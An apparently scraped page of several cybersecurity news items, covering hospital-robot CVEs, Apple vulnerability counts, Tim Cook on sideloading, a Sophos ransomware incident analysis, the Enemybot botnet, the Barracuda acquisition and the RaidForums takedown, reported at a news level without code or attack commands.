Information Technology

Vendor Aethon has patched five critical vulnerabilities in hospital robots used to deliver medical supplies.

The world of health-related cybersecurity issues is still relatively untouched. In recent years, we’ve seen the impact of ransomware outbreaks in hospitals; software vulnerabilities including those that could, in theory, stop a pacemaker from working, and countless patient data leaks at providers worldwide.However, unless there’s a clear-cut financial benefit, many cyberattackers will ignore medical devices in favor of hitting businesses likely to provide them with illicit revenue. This doesn’t mean that vendors, or defenders, should ignore vulnerabilities and security issues surrounding medicine, especially as digital health, personalized medicine, and remote care continue to develop. Medical devices can fall short of adequate security measures, as recently revealed in Cynerio’s public disclosure of Jekyllbot:5 (.PDF), five critical vulnerabilities in Aethon TUG robots. Read on: Black Hat: How your pacemaker could become an insider threat to national securityAethon’s mobile robots are autonomous devices used by hundreds of hospitals to perform basic, repetitive tasks to augment existing workforces. TUGs run errands including medicine delivery, cleaning, and dropping off linen and other supplies to healthcare professionals. Stanford is a healthcare provider that uses the robots in drug deliveries, which can move at 2mph down pre-determined routes. According to Cynerio, the five vulnerabilities allow attackers to take over a robot’s activities, including taking photos; snooping on the hospital in real-time via camera feeds, accessing patient records; disrupting or blocking drug delivery, all of which could impact patient care. In addition, the team says the bugs could be used to hijack user sessions or “take control of the robot’s movement and crash them into people or objects, or use them to harass patients and staff.” The vulnerabilities, now assigned CVEs, are below: CVE-2022-1066 (CVSS 8.2): Missing authorization checks, allowing unauthenticated attackers to add or modify existing user accounts CVE-2022-26423 (CVSS 8.2): Missing authorization checks, allowing free access to hashed credentials CVE-2022-1070 (CVSS 9.8): Failures to verify end users, permitting attackers to access the TUG Home Base Server and take control of connected robots CVE-2022-27494 (CVSS 7.6): User-controlled input is not neutralized, allowing XSS attackers to trigger on report pages CVE-2022-1059 (CVSS 7.6): User-controlled input is not neutralized before being shown in a web portal, and so Fleet page users may be subject to reflected XSS attacksThe critical flaws were found during an audit on behalf of a client healthcare provider. While Cynerio’s customer had not connected their robots to the internet — and, therefore, they were safe from active exploit — the cybersecurity firm said “several” hospitals had internet-connected robots that could be remotely controlled in the Cynerio Live research lab. The vendor was notified of the vulnerabilities through the US Cybersecurity and Infrastructure Security Agency (CISA). Cynerio worked with Aethon to develop suitable patches, and the latest version of TUG firmware contains fixes. In addition, Aethon developed firewall updates at customer hospitals to restrict public access.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Apple products are secure and don’t get malware or hacked. This is a dangerous myth that continues to circulate despite being total garbage.

ZDNet Recommends

The best security key

While robust passwords help you secure your valuable online accounts, hardware-based two-factor authentication takes that security to the next level.

Read More

In fact, the number of vulnerabilities in Apple’s products is rapidly catching up with companies like Google and Microsoft.A report by Atlas VPN (based on data from Telefonica Tech Cybersecurity) shows how vulnerabilities found in Apple products surged by 467% during the second half of 2021 to 380 exploits, a dramatic rise from the 67 uncovered during the first half of 2021.In fact, this puts the number of vulnerabilities found in Apple products in the latter six months of 2021 a stone’s throw away from the top generators of vulnerabilities — Google (511 vulnerabilities) and Microsoft (428 vulnerabilities).Companies with the most vulnerabilities in 2021 H1 and H2
Atlas VPN/Telefonica Tech
According to the report, a good chunk of Apple’s vulnerabilities seems to relate to the Safari web browser and its various operating systems, while the majority of Microsoft’s vulnerabilities are associated with Windows OS versions, Office tools, and the Microsoft Edge browser, while Google’s vulnerabilities are mostly focused around the Android operating system and the Chrome browser.So, what does this mean for Apple users?First, let go of the perilous myth that your Apple gadgets are immune to hacking and malware.They’re not invulnerable.Next, get serious about patching your iPhones, Macs, iPads, and other Apple products. Do it quickly, and check for any updates you might have missed often.Finally, be aware of when your Apple products stop being supported by security updates. Once this point is reached, your devices can start to collect vulnerabilities at a rapid pace. As painful as it is, having an eye on replacing obsolete devices is essential to securing your digital information. More

Apple chief Tim Cook has hit out at proposed competition laws that would force it to allow apps to be downloaded from other app stores, something known as ‘sideloading’ which he warned could undermine security. Cook on Tuesday used his speech at the International Association of Privacy Professionals (IAPP) summit to express Apple’s alarm about US and European proposals that could force it to let users sideload apps on the iPhone outside of the App Store.  Two competition proposals that do threaten Apple’s services-oriented business are the EU’s Digital Markets Act (DMA) and the America’s Open App Markets Act. Both target “gatekeepers” such as Apple and Google. The US proposal, which as of February gained broad support from US lawmakers, aims to require sideloading of apps and remove the need for developers to use Apple’s and Google’s in-app payment systems. Meanwhile, members of the European Parliament agreed to support the DMA last month, which would require messaging platforms from Google, Apple, Meta and others work together, just like SMS works today. Apple on multiple occasions has argued against sideloading because it’s a malware risk to iPhones and it isn’t fond of the DMA either for security reasons. Google is worried the DMA will “reduce innovation and the choice available to Europeans”.Cook said Apple is concerned that these competition regulations put users’ privacy and security at risk.Apple is committed to “protecting people from a data industrial complex built on a foundation of surveillance,” he said, echoing  a phrase he used in 2018 when petitioning US federal lawmakers to create a federal privacy law that emulates Europe’s General Data Protection Regulation (GDPR).   “We have long been supporters of the GDPR … and we continue to call for a strong privacy law in the United States,” said Cook.”We are deeply concerned by regulations that would undermine privacy and security in service of some other aim.””Here in the United States, policy makers are taking steps that would force Apple to let apps on the iPhone that would circumvent the App Store through a process call sideloading. That means data hungry companies would be able to avoid our privacy rules and once again track users against their will.””It would also potentially give bad actors a way around the comprehensive security protections we put in place, putting them in direct contact with our users. And we have already seen the vulnerability that that creates on other companies’ devices.”He noted that during the early part of the pandemic, smartphone users were downloading legitimate COVID-19 tracing apps that turned out to be ransomware.   “But these victims weren’t iPhone users because the scheme directly targeted those that could install apps from websites that lacked the App Stores defenses. Proponents of these legislation argue that no harm would be done by simply giving users the choice. But taking away a more secure option will leave users with less choice,” said Cook.    More

Novice hackers who didn’t know what they were doing spent months inside a government agency network without being detected – before higher-skilled attackers came in after them and launched a ransomware attack. Analysis of the incident at an unspecified US regional government agency by cybersecurity researchers at Sophos found that the amateur intruders left plenty of indicators they were in the network. Yet despite a lack of subtly and leaving a trail behind, they weren’t detected because what Sophos researchers describe as “strategic choices” made by the IT team that made life easy for them. The attackers initially broke into the network using one of the most popular techniques deployed by cyber criminals – breaching the password of internet-facing Windows Remote Desktop Protocol (RDP) on a firewall. It’s uncertain how the password itself was breached, but common methods include brute-force attacks and phishing emails. They also got lucky, because the compromised RDP account wasn’t only a local admin on the server, but also had domain administrator permissions, allowing the account to be exploited to create admin accounts on other servers and desktops. But despite all this power, the intruders didn’t seem to know what to do once they had access to the network. Analysis of activity logs suggested they used the servers they controlled inside the network to run Google searches to look for hacking tools, then following pop-up ads to pirated software downloads. Researchers say this left the server riddled with adware and the hackers unintentionally infecting the servers they controlled with malware. The victim organisation didn’t notice any of this was happening.  SEE: Cloud security in 2022: A business guide to essential tools and best practicesLog data suggests that the attackers were regularly disappearing for days at a time before returning to look around the network, occasionally creating new accounts to gain access to other machines. This continued for months, with the attackers seemingly learning how to hack networks as they went along, as well as installing cryptomining malware on the compromised servers. “This was a very messy attack,” says Andrew Brandt, principal security researcher at Sophos. “They then seemed unsure of what to do next”. But after four months, the attacks suddenly became more focused and more sophisticated. Following a three-week hiatus with no activity, attackers remotely connected and installed the password-sniffing tool Mimikatz in order to gain access to additional usernames and passwords, storing them all in a text file on the desktop of admin-level accounts they created.  These attackers also looked to remove the coinminer which had previously been installed and attempted to uninstall antivirus software on endpoints. It’s likely that the higher sophistication of the attacks mean new intruders had gained access to the network. “When you see an abrupt change in both goals and skill level in an attack like this, in which the original ingress point is at that point still open as it was in this case, the safe bet is that another attacker has entered the space” says Brandt.It was at this point the IT department noticed something strange was happening, taking servers offline to investigate – but in order to do this, they also disabled some cybersecurity protections – and the attackers took advantage.  The intruders repeatedly dumped new account credentials and created new accounts in order to continue their attacks. The logs were also wiped repeatedly, in what could have been an attempt to cover their tracks. SEE: Cybersecurity: Let’s get tactical (ZDNet special report)The new, much more sophisticated attackers also stole a set of sensitive files as they worked towards the apparent end goal of a ransomware attack, which fully encrypted some of the machines on the network with LockBit ransomware. But the attack didn’t affect all the machines and the IT department, with the aid of Sophos analysts, were able to clean up and restore services. However, the whole attack could’ve been prevented if better cybersecurity strategies were in place, as attackers were able to freely enter and move around the network without being detected – particularly as measures were implemented to improve efficiency rather than improving cybersecurity, even when it was clear the organisation was under attack. “Disabling features like tamper protection on endpoint security software seemed to be the critical lever the attackers needed to completely remove protection and complete their jobs without hindrance,” researchers said in the blog post. Applying multi-factor authentication to user accounts would have helped prevent them from being exploited and login notifications would’ve provided a warning that something suspicious was under way.  Meanwhile, properly monitoring the network would’ve had indicated something was wrong when the attackers were snooping around, and certainly before another set of hackers broke in and laid the foundation for a ransomware attack.  “Defenders have to keep watch on their network, whether in-house or through a managed-services partner. Keeping an eye out for smaller oddities or incidents – even something as simple as someone logging into a system at odd hours or from an unusual location – can make the difference,” said Brandt. MORE ON CYBERSECURITY More

According to Google Project Zero’s zero-day tracker, there were 25 browser zero-days patched last year, of which 14 were for Chrome, six were for Safari’s WebKit engine, and four were for Internet Explorer. In 2020, there were just 14 browser zero-day flaws.SEE: Google: We’re spotting more Chrome browser zero-day flaws in the wild. Here’s why More

A new botnet is targeting routers, Internet of Things (IoT) devices, and an array of server architectures.

On April 12, cybersecurity researchers from FortiGuard Labs said the new distributed denial-of-service (DDoS) botnet, dubbed Enemybot, borrows modules from the infamous Mirai botnet’s source code, alongside Gafgyt’s.The Mirai botnet was responsible for a massive DDoS attack against Dyn in 2016. Mirai’s source code was leaked online in the same year, and even now, botnets utilizing parts of the malicious network continue to be weapons of choice for threat actors. Gafgyt/Bashlite code is also public, and according to FortiGuard, the new Enemybot employs elements of both botnets in its attacks, joining the likes of Okiru, Satori, and Masuta. Keksec is thought to be the botnet’s operator. Keksec, also known as Necro or Freakout, is a prolific threat group connected to DDoS assaults, cyberattacks against cloud service providers, and cryptojacking campaigns. According to Lacework, the threat group is also the developer of a Tsunami DDoS malware variant called “Ryuk,” although this is not to be confused with the Ryuk ransomware family. Enemybot was first discovered in March 2022. The botnet uses Mirai’s scanner module and bot killer, which checks for running processes in memory and terminates any competitors based on a selection of keywords. The team has described the botnet as an “updated and “rebranded” variant of Gafgyt_tor” due to its heavy reliance on botnet functions sourced from Gafgyt’s codebase. Enemybot will attempt to compromise a wide range of devices and architectures through techniques including brute-force attacks and vulnerability exploitation.Seowon Intech, D-Link, Netgear, Zhone, and D-Link routers are targeted, as well as iRZ mobile routers and misconfigured Android devices. The threat actors will try to exploit both old, patched vulnerabilities and newer security issues such as Log4j. When it comes to architecture, Enemybot isn’t too picky. Desktop and server systems on arm, arm64, Darwin, and BSD are attacked, alongside many others. “This mix of exploits targeting web servers and applications beyond the usual IoT devices, coupled with the wide range of supported architectures, might be a sign of Keksec testing the viability of expanding the botnet beyond low-resource IoT devices for more than just DDoS attacks,” the researchers say. Once the malware has compromised a device or server, a text file is loaded with cleartext messages, such as: “ENEMEYBOT V3.1-ALCAPONE – hail KEKSEC, ALSO U GOT haCkED MY [REDACTED] (Your device literally has the security of a [shitty device] / [smart doorbell]).” Enemybot then grabs binaries, depending on the target architecture, and executes a range of DDoS-related commands. The malware can also use a range of obfuscation methods to hinder analysis and hide its presence. The botnet’s command-and-control (C2) server is hosted on a .onion domain, only accessible via the Tor network. Enemybot is still under active development. “We expect that more updated versions will be distributed in the wild soon,” the researchers say. “FortiGuard Labs will keep monitoring this botnet.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Barracuda Networks has been acquired by KKR, an investment outfit taking the company over from past owner Thoma Bravo.

Founded in 2003, Barracuda is the developer of cybersecurity solutions, including email protection, app and cloud defenses, data management, and network security. Products include Secure Access Service Edge (SASE) offerings, threat detection and response, and data inspection.The company caters to approximately 200,000 customers worldwide and focuses on small to medium-sized businesses. It appears that the cybersecurity firm recently captured the interest of KKR, an investment company that markets itself as offering “alternative asset management.” The funds managed by KKR include hedge funds, private equity, credit, and real-world assets. The acquisition was announced on April 12. Private equity firm Thoma Bravo purchased Barracuda in 2017 for $1.6 billion. At the time, the sale was intended to increase Barracuda’s growth and maximize shareholder value. Four years after being listed on the NYSE, Barracuda (CUDA) then went private. The financial terms of the deal have not been disclosed. However, the companies say that since Thoma Bravo’s acquisition, Barracuda has enjoyed growth at “over $500 million” in revenue. Reuters reports that the acquisition is worth approximately $4 billion, including debt. KKR says that Barracuda’s growth is still a priority and the investment outfit will support its expansion in areas including detection and response and SASE. “We continue to see cybersecurity as a highly attractive sector and are excited to back a clear leader in the space,” commented John Park, Head of Americas Technology Private Equity at KKR. “Given its proven track record of growth and innovation, we believe that Barracuda has the right team and model to capture business in this growing market.” The transaction is expected to close by the end of 2022, subject to customary conditions.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Image: Getty Images
The RaidForums hacker forum, used by cybercriminals to primarily buy and sell stolen databases, has been shut down and its domains seized by US law enforcement as part of an operation coordinated by Europol that involved law enforcement agencies across numerous countries. “The takedown of this online market for the resale of hacked or stolen data disrupts one of the major ways cybercriminals profit from the large-scale theft of sensitive personal and financial information,” US Justice Department (DOJ) assistant attorney-general Kenneth Polite Jr said in a statement. Prior to the forum’s seizure, hundreds of databases of stolen data containing more than 10 billion unique records for individuals had been offered for sale, the DOJ said. The global enforcement action, labelled as Operation Tourniquet, saw Europol, the UK National Crime Agency (NCA), US Justice Department, along with Portuguese, Swedish, and Romanian law enforcement officials work together to close the RaidForums hacker forum. The various countries worked together on this operation for at least a year through Europol’s Joint Cybercrime Action Taskforce, where officials exchanged information with each other to enable investigators to define the different roles played by the individuals who ran the marketplace, Europol said. US charges have also been laid against RaidForums’ Portuguese founder and chief administrator, Diogo Santos Coelho, who was arrested in the UK in January. Coelho has been accused of running the forum, which entailed establishing a membership scheme where users of the site could pay for access to chatrooms that allowed the exchange of links, photographs, and data linked to cyber-crime.Among the charges are conspiracy, access device fraud, and aggravated identify theft in connection with his role as the chief administrator of RaidForums. Coelho is currently in UK custody and could be extradited to the US pending legal proceedings to face these charges. Two of Coelho’s accomplices have also been arrested. One of them, a 21-year-old UK citizen, was arrested by the NCA in March but has since been released under investigation. At the time of this unnamed individual’s arrest, police officers seized £5,000 in cash, thousands in US dollars, and put a freeze on crypto assets worth more than half a million dollars. Related Coverage More